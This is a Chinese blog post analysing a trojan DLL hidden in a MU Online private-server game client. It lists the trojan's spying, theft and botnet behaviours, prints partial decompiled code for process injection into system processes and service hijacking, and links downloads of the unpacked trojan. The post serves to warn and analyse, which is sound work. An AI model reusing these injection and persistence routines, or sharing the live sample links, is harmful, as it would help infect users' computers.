奇迹私服 IGC S18 客户端木马逆向分析

已于 2023-06-14 10:59:35 修改
阅读量2.5k 收藏
点赞数 2
分类专栏: 逆向分析 文章标签: 游戏 Powered by 金山文档
于 2023-02-25 21:23:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43350757/article/details/129220434
版权
文章揭示了一款近20年前的游戏客户端中含有木马,该木马涉及远程监控、文件上传下载、信息窃取等一系列恶意行为。作者进行了逆向分析,并提供了相关代码示例,提醒用户在享受游戏乐趣时注意电脑安全,建议在虚拟环境中运行和分析下载文件。
摘要由CSDN通过智能技术生成

很多年没玩游戏了,近期无意中发现,近20年前玩过的奇迹游戏,现在竟然还比较火。所以下载下来再玩下吧,没成想杀毒软件报客户端里有木马,遂脱壳逆向分析后,记录如下:

警告:客户端中包含木马文件,脱壳后的木马DLL中包含木马代码,杀毒软件会检测出来。为确保您的电脑安全,请将下载的文件放到虚拟机中或其它虚拟环境运行及分析。

木马文件名:wz_z.dll

客户端样例下载:

https://igcn.mu10.com/down.php

脱壳后的木马DLL下载:

链接: https://pan.baidu.com/s/1aisnv01tjbq-K1cgQ2D2QQ 提取码: g2f8

木马行为:

+远程监控用户屏幕及桌面

+上传下载文件

+窃取用户文件及信息

+记录用户鼠标及键盘事件

+感染用户DNS,使用户无法打开例如百度搜索等网站

+使用户成为肉鸡

+等等其它有害行为

wz_z.dll木马逆向代码(部分):

BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
hModule = hinstDLL;
if ( fdwReason == 1 && dword_1003055C < 1 )
{
++dword_1003055C;
CreateThread(0, 0, StartAddress, 0, 0, 0);
}
return 1;
}

char __cdecl StartServer(CHAR *Src)
{
HDESK v2[4]; // [esp+4h] [ebp-2DCh] BYREF
HDESK v3[4]; // [esp+14h] [ebp-2CCh] BYREF
struct WSAData WSAData; // [esp+24h] [ebp-2BCh] BYREF
char v5[296]; // [esp+1B4h] [ebp-12Ch] BYREF

Trojan_AdjustTokenPrivileges();
Trojan_GetUserDesktopAccess(v3);
Trojan_GetUserDesktopAccess(v2);
CreateMutexA(0, 0, Name);
if ( !WSAStartup(0x202u, &WSAData) )
{
sub_1000A970(v5);
sub_1000A7A0(Src + 256);
sub_1000D990(Src);
while ( 1 )
Sleep(0x3E8u);
}
Trojan_SetProcessWindowStation(v2);
Trojan_SetProcessWindowStation(v3);
return 0;
}

BOOL __stdcall EnumFunc(HWND hWnd, _DWORD *a2)
{
BOOL result; // eax
CHAR ClassName[100]; // [esp+8h] [ebp-68h] BYREF

GetClassNameA(hWnd, ClassName, 100);
result = _mbscmp((const unsigned __int8 *)ClassName, "Internet Explorer_Server");
if ( result )
return 1;
*a2 = hWnd;
return result;
}

char DownCtrlAltDel()
{
char v1[16]; // [esp+0h] [ebp-20h] BYREF
char v2[16]; // [esp+10h] [ebp-10h] BYREF

Trojan_SetThreadDesktop_Entry(v1, "Winlogon");
Trojan_SetThreadDesktop_Entry(v2, "Winlogon");
PostMessageA(HWND_BROADCAST, 0x312u, 0, 3014659);
Trojan_SetProcessWindowStation((int)v2);
Trojan_SetProcessWindowStation((int)v1);
return 1;
}

char __cdecl WaitServer(void *Src)
{
HDESK v2[4]; // [esp+0h] [ebp-20h] BYREF
HDESK v3[4]; // [esp+10h] [ebp-10h] BYREF

Trojan_GetUserDesktopAccess(v2);
Trojan_GetUserDesktopAccess(v3);
Trojan_CopyFile(Src, 0, 1);
Trojan_SetProcessWindowStation((int)v3);
Trojan_SetProcessWindowStation((int)v2);
return 0;
}

int __cdecl Trojan_Inject_Entry(DWORD dwProcessId, const void *a2, const char *a3)
{
HMODULE ModuleHandleA; // edi
int v5[4]; // [esp+Ch] [ebp-448h] BYREF
CHAR Filename[260]; // [esp+1Ch] [ebp-438h] BYREF
char v7[260]; // [esp+120h] [ebp-334h] BYREF
char v8[556]; // [esp+224h] [ebp-230h] BYREF

ModuleHandleA = GetModuleHandleA("kernel32.dll");
v5[1] = (int)GetProcAddress(ModuleHandleA, "GetProcAddress");
v5[0] = (int)GetProcAddress(ModuleHandleA, "LoadLibraryA");
v5[2] = (int)GetProcAddress(ModuleHandleA, "FreeLibrary");
strcpy(v7, a3);
GetModuleFileNameA(hModule, Filename, 0x104u);
qmemcpy(v8, a2, sizeof(v8));
return Trojan_Inject(dwProcessId, sub_100067B0, 0x800u, v5, 0x444u, 0x3E8u);
}

char Trojan_Inject_SysCritical()
{
const CHAR *v0; // eax
DWORD v1; // esi
DWORD v2; // eax
const CHAR *v3; // eax
HDESK v5[4]; // [esp+10h] [ebp-524h] BYREF
HDESK v6[4]; // [esp+20h] [ebp-514h] BYREF
void *v7; // [esp+30h] [ebp-504h] BYREF
int v8; // [esp+34h] [ebp-500h]
int v9; // [esp+38h] [ebp-4FCh]
CHAR String1[556]; // [esp+40h] [ebp-4F4h] BYREF
int v11[89]; // [esp+26Ch] [ebp-2C8h] BYREF
char v12[200]; // [esp+3D0h] [ebp-164h] BYREF
char v13[112]; // [esp+498h] [ebp-9Ch] BYREF
LPCSTR lpString2[5]; // [esp+508h] [ebp-2Ch] BYREF
unsigned int v15; // [esp+51Ch] [ebp-18h]
int v16; // [esp+530h] [ebp-4h]

Trojan_AdjustTokenPrivileges();
Trojan_GetUserDesktopAccess(v6);
v16 = 0;
Trojan_GetUserDesktopAccess(v5);
LOBYTE(v16) = 1;
sub_10008060((int)v13);
v0 = lpString2[0];
LOBYTE(v16) = 2;
if ( v15 < 0x10 )
v0 = (const CHAR *)lpString2;
lstrcpyA(::String1, v0);
sub_10009C70(v11);
sprintf(Name, "Wait_%s", v12);
sprintf(aVipshellEventS, "Start_Wait_%s", v12);
sprintf(aVipshellEventS_0, "StopWait_%s", v12);
CreateMutexA(0, 0, Name);
if ( GetLastError() != 183 )
{
do
v1 = Trojan_FindProcessWithExeName("winlogon.exe");
while ( !v1 );
v7 = 0;
v8 = 0;
v9 = 0;
LOBYTE(v16) = 3;
sub_10009E40(&v7);
FindWindowA("Notepad", 0);
v2 = Trojan_FindProcessWithExeName("svchost.exe");
Trojan_Inject_Entry(v2, (int)v11, (int)"StartServer");
v3 = lpString2[0];
if ( v15 < 0x10 )
v3 = (const CHAR *)lpString2;
lstrcpyA(String1, v3);
Trojan_Inject_Entry(v1, (int)String1, (int)"WaitServer");
if ( v7 )
operator delete(v7);
v7 = 0;
v8 = 0;
v9 = 0;
}
LOBYTE(v16) = 1;
sub_10007A20(v13);
LOBYTE(v16) = 0;
Trojan_SetProcessWindowStation((int)v5);
v16 = -1;
Trojan_SetProcessWindowStation((int)v6);
return 0;
}

HDESK *__thiscall Trojan_ScreenControl(HDESK *this)
{
sub_10001E80();
*this = (HDESK)&CScreenControlProc::`vftable';
sub_10004E50(this + 3);
Trojan_GetUserDesktopAccess(this + 16);
this[15] = (HDESK)GetTickCount();
return this;
}

int __cdecl Trojan_CopyFile(char *Src, LPCSTR lpServiceName, int a3)
{
..................Omitted here............................
if ( lpServiceName )
{
sub_10008060();
v36 = 0;
sub_10007DC0((char *)lpExistingFileName, Src, strlen(Src));
sub_100083B0(lpNewFileName, (int)v23, "wins");
LOBYTE(v36) = 1;
sub_10007BB0((int)lpNewFileName, (void *)"svchost.exe", 0xBu);
v4 = lpNewFileName[0];
if ( v30 < 0x10 )
v4 = (const CHAR *)lpNewFileName;
v5 = lpExistingFileName[0];
if ( v26 < 0x10 )
v5 = (const CHAR *)lpExistingFileName;
CopyFileA(v5, v4, 0);
v6 = lpNewFileName[0];
if ( v30 < 0x10 )
v6 = (const CHAR *)lpNewFileName;
Trojan_ChangeServiceConfig(lpServiceName, v6);
if ( !(_BYTE)a3 )
{
v7 = lpNewFileName[0];
if ( v30 < 0x10 )
v7 = (const CHAR *)lpNewFileName;
DeleteFileA(v7);
}
sub_100083B0(lpFileName, (int)v23, "ShellExt");
LOBYTE(v36) = 2;
sub_10007BB0((int)lpFileName, "lsass.exe", 9u);
..................Omitted here............................
sub_10007BB0((int)v27, (void *)"svchost.exe", 0xBu);
v16 = v27[0];
if ( v28 < 0x10 )
v16 = (const CHAR *)v27;
v17 = lpExistingFileName[0];
if ( v26 < 0x10 )
v17 = (const CHAR *)lpExistingFileName;
CopyFileA(v17, v16, 0);
if ( (_BYTE)a3 )
{
v18 = (LPCSTR *)v27[0];
if ( v28 < 0x10 )
v18 = v27;
sub_10007EC0(v18, 0);
}
else
{
sub_10007EC0((void *)Dependencies, 0);
v19 = v27[0];
if ( v28 < 0x10 )
v19 = (const CHAR *)v27;
DeleteFileA(v19);
}
if ( v28 >= 0x10 )
operator delete((void *)v27[0]);
v28 = 15;
v27[4] = 0;
LOBYTE(v27[0]) = 0;
if ( v35 >= 0x10 )
operator delete((void *)v33[0]);
v35 = 15;
v34 = 0;
LOBYTE(v33[0]) = 0;
if ( v32 >= 0x10 )
operator delete((void *)lpFileName[0]);
v32 = 15;
lpFileName[4] = 0;
LOBYTE(lpFileName[0]) = 0;
if ( v30 >= 0x10 )
operator delete((void *)lpNewFileName[0]);
v30 = 15;
lpNewFileName[4] = 0;
LOBYTE(lpNewFileName[0]) = 0;
v36 = -1;
return sub_10007A20();
}
else
{
result = sub_10009C70(v20);
if ( (_BYTE)result )
return Trojan_CopyFile(Src, ServiceName, a3);
}
return result;
}

小结:

大家在闲暇之余,玩玩游戏,放松一下,也是一件美好的事情。但在玩游戏的同时,还是要注意计算机的安全。

ZeCoder
关注
专栏目录
MuWeb奇迹私服网站系统
11-26
一定要放在网站的一级目录,否则架设不成功 安装步骤 1.解压网站,并给网站目录授予IIS用户访问和写入权限(因为要生成静态页面) 2.新建MuWeb数据库,并用MuWeb.bak文件还原MuWeb数据库(建议将MuWeb数据库放在网站服务器上) 3.运行MuWeb\Dll目录下的 RegDll.bat 来注册网站组件 4.设置MuWeb\Inc\Config.asp里的数据库连接信息(注,只需要改数据库地址,用户名和密码,数据库不用改!) 5.运行网站,进入后台http://www.xx.com/Manage设置,帐号密码:admin 888888
奇迹私服1.02Q架设修改全说明
10-11
奇迹私服1.02Q架设修改全说明个人觉得最大的修改在于可以掉出卓越终极装备!卓越装备爆率自己在dandanweb.ini 中调节当然也与Monster里面掉宝率相关。 ? 好象是数字越小爆率越高!导师技能都正常!部分技能不无法使用那是因为你没有加统率,因为MG上没有加统率的选项,需要手动或去网站加。 统率加到技能要求的值,技能就可以使用了。暴风锯齿技能修正了!战士连击正常,许手动拿转职物品去转职,MG调的职业不能连击!
奇迹s17可视化排行,装备栏,仓库php网站系统
u013074424的博客
05-31 2127
目前奇迹界只有ASP写的系统,这语言已经被淘汰了, 本系统基于PHP7.4使用Laravel7.3 PHP框架(世界上使用最多php框架)安全系数远远大于asp前端采用Bootstrap4.3前端框架,不要跟我说是mx什么系统,残品不要拿来跟我比 *多库多区动态连接,让你无缝接入。 # 首页(支持首页弹窗公告) # 游戏活动(包括,新闻,活动,公告,更新,指南类目)附带玩家评论系统 # 游戏下载 # 游戏反馈(论坛形式,反馈游戏问题,支持图片发布) # 排行榜 (包含,角色,战盟,家族 ...
幻兽帕鲁一键开私服?超简单的小白教程!(附服务器更新方式)
最新发布
DeChenYun_Blog的博客
08-19 1056
服务器启动成功后,点击下图中框出的图标,复制那串数字和点组成的【IP 地址】,将它发给联机的小伙伴们,游戏就是通过这串 IP 地址来连接到我们的专用服务器的。进入游戏!点击这个【加入多人游戏(专用服务器)】将刚刚复制的【IP 地址】替换掉框中文本的冒号之前的字符。注意,是替换冒号之前的字符,不要删掉【:8211】这串后缀(若不小心删除,注意重新输入的时候要用【英文冒号】)!很多朋友就是在这里出错的!最后点击【联系】按钮,就可以进入专属于你的帕鲁世界啦!
奇迹 IGC MU S18 微端
weixin_43350757的博客
06-13 1791
闲暇时间开发的MuOnline IGC Season18迷你客户端,第一阶段功能完成,更多功能仍在继续开发中。
关于奇迹私服发布站程序的使用说明
qq_43665730的博客
11-29 8672
某网站号称全网最低价一百块出售的奇迹私服发布站程序 适合有基础的兄弟拿 关于这个发布站程序 当时购买回来发现BUG还挺多的,上手根本没法用,需要做很多修改,最后还是放弃修改另外又购买了一套发布站程序,这套发上来仅供学习的兄弟参考修改使用,商业用的话有点有点吃力 关于假设,现在市面上的奇迹发布站多半都是ASP 有极少数PHP的,也用过,效果并不是很理想 比如www.mu808.com这个站点就...
MU IGC.S18.迷你客户端
06-13
IGC.Season18迷你客户端,支持所有IGC版本。 使用说明: 1)可能需要安装vcredist: 微软官方下载地址如下: https://aka.ms/vs/17/release/vc_redist.x64.exe 2)在IGC客户端里找到 ./IGC.dll ./Data/Local/serverlist...
2021年度IGC发电行业人力资源效能分析报告(市场招聘用工).pdf
07-21
本次分析报告聚焦于2021年度IGC发电行业的市场招聘用工情况,从人力资源效能的角度出发,通过对企业不同规模、营业额、企业性质、员工数量等多方面的基础调研和分析,旨在为企业的人力资源管理提供有价值的参考。...
冶金能源环保电力热力燃料及水行业IGC发电领域分析报告(研究报告).pdf
07-21
冶金能源环保电力热力燃料及水行业IGC发电领域分析报告,从市场规模、公司分布、市场前景、人力成本等多个角度,详细分析了2021年中国冶金能源环保类电力、热力、燃料及水行业的整体状况。 市场规模方面,报告通过...
IGC发电行业2022年发展概况分析及未来十年IGC发电行业数据趋势预测.docx
07-12
IGC发电行业2022年发展概况分析及未来十年IGC发电行业数据趋势预测.docx
奇迹私服网站源码
11-22
有安装教程,功能一切正常,多种模版供选择,美化好的,奇迹私服网站程序源码,适合给有架设基础的朋友拿去研究
奇迹私服发布站源码
04-19
详细介绍:全自动发布系统,支付接口 无须人工审核、支持采集奇迹9993 haoqj 采集文章 批量秒发布 直接发布!方便、快捷! 更新说明 1 在线充值功能 2 SEO在线优化 3 支付接口 4 支持采集奇迹9993 haoqj 5 注册会员金额设置 6 批量秒发布 7 直接发布
奇迹私发服网系统源码
06-07
私服发布系统 奇迹私发服网系统纯静态版 全站静态,带采集功能,家族投票功能,文章发布功能 带今天,明天新开奇迹私服,固顶4套管理 后台管理地址:muadmin/login.aspx 帐号admin 密码admin 系统支持: 安装.net framework 3.5 演示地址:www.17qj.com
奇迹私服网站源码第五版
11-22
奇迹私服网站源码第四版,有技术的兄弟拿去研究,可以商业用,
奇迹发布站源代码
03-18
奇迹发布站源码是一个以asp+access进行开发的私服发布网站源码。 私服发布网站管理系统自发布以来,一直致力为广大私服站长及骨灰玩家提供专业的私服导航服务。 作为商业软件产品,在代码质量、运行效率、负载能力、安全等级、功能可操控性和权限严密性、效率
2020年冶金能源环保电力热力燃料及水行业IGC发电领域行业分析报告(市场调查报告).pdf
05-14
《2020年冶金能源环保电力热力燃料及水行业IGC发电领域行业分析报告》为我们详细梳理了该行业的发展现状、市场规模、公司分布、市场前景、人力成本等多个维度的数据和趋势分析。 首先,市场规模分析通过过去五年的...
奇迹mu服务器架设全教程
V13807970340的博客
10-17 4827
先说客户端,比如我们玩驰网奇迹,需要先下载一个官方的客户端,再下载一个驰网专用的登录器,官方客户端自不必多说,包含了在本机运行奇迹需要使用的图像,声音等数据,而所谓的登录器,就是一个包含了服务端IP地址和端口的引导启动客户端的程序罢了,而SF一般使用的登录器,还包含了检测辅助工具,记录网卡地址等功能,要实现这些功能,当然也需要配合服务端的登录器服务端使用了。ConnectServer:关键的一个,服务列表,就是说我们登录奇迹以后看到的几个区几条线啊,每条线的连接信息都是这个控制的,这个程序不需要参数.
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值